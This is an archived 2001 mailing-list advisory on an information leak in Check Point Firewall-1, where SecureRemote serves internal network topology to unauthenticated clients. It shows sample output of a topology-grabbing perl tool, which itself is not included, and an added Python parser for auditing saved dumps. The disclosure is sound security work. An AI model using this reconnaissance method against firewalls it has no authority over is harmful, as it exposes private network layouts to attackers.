

Firewall-1 Information leak


Date: Wed, 18 Jul 2001 03:29:28 +0200 (SAST)
From: Haroon Meer <haroon@sensepost.com.>
To: [email protected]
Subject: Firewall-1 Information leak




Hi.

Checkpoint Firewall-1 makes use of a piece of software called SecureRemote
to create encrypted sessions between users and FW-1 modules. Before remote
users are able to communicate with internal hosts, a network topology of
the protected network is downloaded to the client. While newer versions of
the FW-1 software have the ability to restrict these downloads to only
authenticated sessions, the default setting allows unauthenticated
requests to be honoured. This gives a potential attacker a wealth of
information including ip addresses, network masks (and even friendly
descriptions).

The attached file will connect to the firewall, and download the
topology (if SecureRemote is running)
(it is a tiny perl file, which needs only Socket, so avoids the hassle of
having to install the SecureRemote client <or booting windows> to test a
firewall-1) 

--snip--
SensePost# perl sr.pl firewall.victim.com
Testing  on port 256
        :val (
                :reply (
                        : (-SensePost-dotcom-.hal9000-19.3.167.186
                                :type (gateway)
                                :is_fwz (true)
                                :is_isakmp (true)
                                :certificates ()
                                :uencapport (2746)
                                :fwver (4.1)
                                :ipaddr (19.3.167.186)
                                :ipmask (255.255.255.255)
                                :resolve_multiple_interfaces ()
                                :ifaddrs (
                                        : (16.3.167.186)
                                        : (12.20.240.1)
                                        : (16.3.170.1)
                                        : (29.203.37.97)
                                )
                                :firewall (installed)
                                :location (external)
                                :keyloc (remote)
                                :userc_crypt_ver (1)
                                :keymanager (
                                        :type (refobj)
                                        :refname ("#_-SensePost-dotcom-")

)                               :name
                                (-SensePost-dotcom-Neo16.3.167.189)
                                                :type (gateway)
                                                :ipaddr (172.29.0.1)
                                                :ipmask (255.255.255.255)
                                        )
        
--snip-- 

Haroon Meer
+27 837866637
[email protected]
http://www.sensepost.com
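
To audit what a gateway you administer hands out in such a reply, the added example below (not the sr.pl attachment and not part of the original post) parses a saved topology dump in the format shown above and lists every address it discloses, flagging RFC 1918 ones. The function names and the sample data are constructed for illustration; the parser assumes only the ":key (value ...)" layout visible in the output above.

```python
import ipaddress
import re
TOKEN = re.compile(r'\(|\)|:[^\s()]*|"[^"]*"|[^\s()]+')
RFC1918 = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]

# Constructed sample in the format shown above; deliberately cut off mid-reply.
SAMPLE = """
:val ( :reply (
    : (gw-example
        :type (gateway) :fwver (4.1)
        :ipaddr (192.0.2.10)
        :ifaddrs (
            : (192.0.2.10) : (10.1.1.1)
        )
    )
    : (intranet-host
        :ipaddr (172.16.5.1)
"""

def parse(text):
    """Build a tree from ':key (value :child (...))' text; tolerates clipped input."""
    stack, key = [{"value": None, "children": []}], ""
    for tok in TOKEN.findall(text):
        if tok.startswith(":"):
            key = tok[1:]                      # key applies to the next '('
        elif tok == "(":
            node = {"value": None, "children": []}
            stack[-1]["children"].append((key, node))
            stack.append(node)
            key = ""
        elif tok == ")":
            stack = stack[:-1] or stack        # never pop the root on a stray ')'
        elif stack[-1]["value"] is None:
            stack[-1]["value"] = tok.strip('"')
    return stack[0]

def disclosed_addresses(node, owner="?", parent=""):
    """Return (object, field, address, is_rfc1918) for each address in the tree."""
    found = []
    for key, child in node["children"]:
        field = key or parent                  # ': (x)' list items inherit the list key
        name = (not key and child["children"] and child["value"]) or owner
        if field in ("ipaddr", "ifaddrs") and child["value"]:
            try:
                ip = ipaddress.ip_address(child["value"])
                found.append((name, field, str(ip), any(ip in n for n in RFC1918)))
            except ValueError:
                pass                           # value is not an address; skip it
        found += disclosed_addresses(child, name, key)
    return found
```

Rows whose last field is True are internal addresses that the reply exposes to anyone who can request the topology.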


